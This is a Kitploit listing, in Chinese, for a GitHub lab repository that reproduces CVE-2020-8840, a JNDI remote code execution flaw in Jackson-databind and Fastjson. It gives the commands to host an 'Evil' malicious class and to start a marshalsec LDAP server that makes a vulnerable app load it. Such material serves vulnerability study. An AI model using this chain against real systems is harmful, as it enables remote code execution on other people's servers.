Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-8840 — Jackson-databind远程代码执行漏洞(CVE-2020-8840)分析复现环境代码 | Kitploit
工具/GitHubGitHub/veraxy00/cve-2020-8840
漏洞分析代码分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubveraxy00/cve-2020-8840

CVE-2020-8840

Jackson-databind远程代码执行漏洞(CVE-2020-8840)分析复现环境代码

查看仓库
42495年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-8840

Jackson-databind远程代码执行漏洞(CVE-2020-8840)分析复现环境代码。

项目包含:

  • jackson-databind、Fastjson中payload
  • WebServer恶意类
  • 编译好的marshalsec-0.0.3-SNAPSHOT-all.jar

漏洞简介

Jackson-databind远程代码执行漏洞(CVE-2020-8840),攻击者可利用xbean-reflect的利用链(org.apache.xbean.propertyeditor.JndiConverter)触发JNDI远程类加载从而达到远程代码执行。

该漏洞同时影响部分版本的jackson-databind和Fastjson。

jackson-databind

影响范围:2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

简易环境搭建

示例代码中指向的LDAP服务需要自行搭建。

WebServer

开启HTTP服务,存放恶意类(项目中有贴Evil.java类)

root@kitploit:~
python -m http.server 2222

LDAP服务

下载 Marshalsec 工具,编译为jar,开启LDAP服务,设置codebase地址(存放恶意类的WebServer)。

为了方便,省去下载编译的操作,项目中也贴marshalsec-0.0.3-SNAPSHOT-all.jar了(项目代码不多,体积庞大的主要原因),JDK8编译。

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

Fastjson

影响范围:Fastjson <= 1.2.62

复现环境与上文一致,自行搭建启动WebServer、LDAP服务。

参考

  • https://github.com/FasterXML/jackson-databind
  • https://github.com/FasterXML/jackson-databind/issues/2620
  • https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
  • https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
  • https://github.com/alibaba/fastjson
下载工具